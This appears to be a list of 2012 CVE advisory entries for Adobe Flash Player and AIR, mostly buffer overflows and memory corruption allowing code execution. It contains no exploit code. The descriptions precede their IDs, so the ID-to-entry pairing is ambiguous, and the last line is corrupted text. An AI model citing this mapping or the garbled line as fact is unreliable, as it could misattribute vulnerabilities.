    Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x; Adobe AIR before 3.4.0.2710; and Adobe AIR SDK before 3.4.0.2710 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than other Flash Player buffer overflow CVEs listed in APSB12-22.

    CVE-2012-5254 http://www.cvedetails.com/cve/CVE-2012-5254/

    Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x; Adobe AIR before 3.4.0.2710; and Adobe AIR SDK before 3.4.0.2710 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than other Flash Player buffer overflow CVEs listed in APSB12-22.


    CVE-2012-5253 http://www.cvedetails.com/cve/CVE-2012-5253/

    Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x; Adobe AIR before 3.4.0.2710; and Adobe AIR SDK before 3.4.0.2710 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than other Flash Player buffer overflow CVEs listed in APSB12-22.

    CVE-2012-5252 http://www.cvedetails.com/cve/CVE-2012-5252/

    Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x; Adobe AIR before 3.4.0.2710; and Adobe AIR SDK before 3.4.0.2710 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than other Flash Player memory corruption CVEs listed in APSB12-22.

    CVE-2012-5251 http://www.cvedetails.com/cve/CVE-2012-5251/

    Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x; Adobe AIR before 3.4.0.2710; and Adobe AIR SDK before 3.4.0.2710 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than other Flash Player buffer overflow CVEs listed in APSB12-22.

    CVE-2012-5250 http://www.cvedetails.com/cve/CVE-2012-5250/

    Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x; Adobe AIR before 3.4.0.2710; and Adobe AIR SDK before 3.4.0.2710 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than other Flash Player buffer overflow CVEs listed in APSB12-22.

    CVE-2012-5249 http://www.cvedetails.com/cve/CVE-2012-5249/

    Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x; Adobe AIR before 3.4.0.2710; and Adobe AIR SDK before 3.4.0.2710 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than other Flash Player buffer overflow CVEs listed in APSB12-22.

    CVE-2012-5248 http://www.cvedetails.com/cve/CVE-2012-5248/

    Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x; Adobe AIR before 3.4.0.2710; and Adobe AIR SDK before 3.4.0.2710 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than other Flash Player buffer overflow CVEs listed in APSB12-22.

    CVE-2012-5054 http://www.cvedetails.com/cve/CVE-2012-5054/

    Integer overflow in the copyRawDataTo method in the Matrix3D class in Adobe Flash Player before 11.4.402.265 allows remote attackers to execute arbitrary code via malformed arguments.


    CVE-2012-4171 http://www.cvedetails.com/cve/CVE-2012-4171/

    Adobe Flash Player before 10.3.183.23 and 11.x before 11.4.402.265 on Windows and Mac OS X, before 10.3.183.23 and 11.x before 11.2.202.238 on Linux, before 11.1.111.16 on Android 2.x and 3.x, and before 11.1.115.17 on Android 4.x; Adobe AIR before 3.4.0.2540; and Adobe AIR SDK before 3.4.0.2540 allow attackers to cause a denial of service (application crash) by leveraging a logic error during handling of Firefox dialogs.

    CVE-2012-4168 http://www.cvedetails.com/cve/CVE-2012-4168/

    Adobe Flash Player before 10.3.183.23 and 11.x before 11.4.402.265 on Windows and Mac OS X, before 10.3.183.23 and 11.x before 11.2.202.238 on Linux, before 11.1.111.16 on Android 2.x and 3.x, and before 11.1.115.17 on Android 4.x; Adobe AIR before 3.4.0.2540; and Adobe AIR SDK before 3.4.0.2540 allow remote attackers to read content from a different domain via a crafted web site.

    CVE-2012-4167 http://www.cvedetails.com/cve/CVE-2012-4167/

    Integer overflow in Adobe Flash Player before 10.3.183.23 and 11.x before 11.4.402.265 on Windows and Mac OS X, before 10.3.183.23 and 11.x before 11.2.202.238 on Linux, before 11.1.111.16 on Android 2.x and 3.x, and before 11.1.115.17 on Android 4.x; Adobe AIR before 3.4.0.2540; and Adobe AIR SDK before 3.4.0.2540 allows attackers to execute arbitrary code via unspecified vectors.

    C)-2012-+1#! htt(344&&&$cvedetails$com4c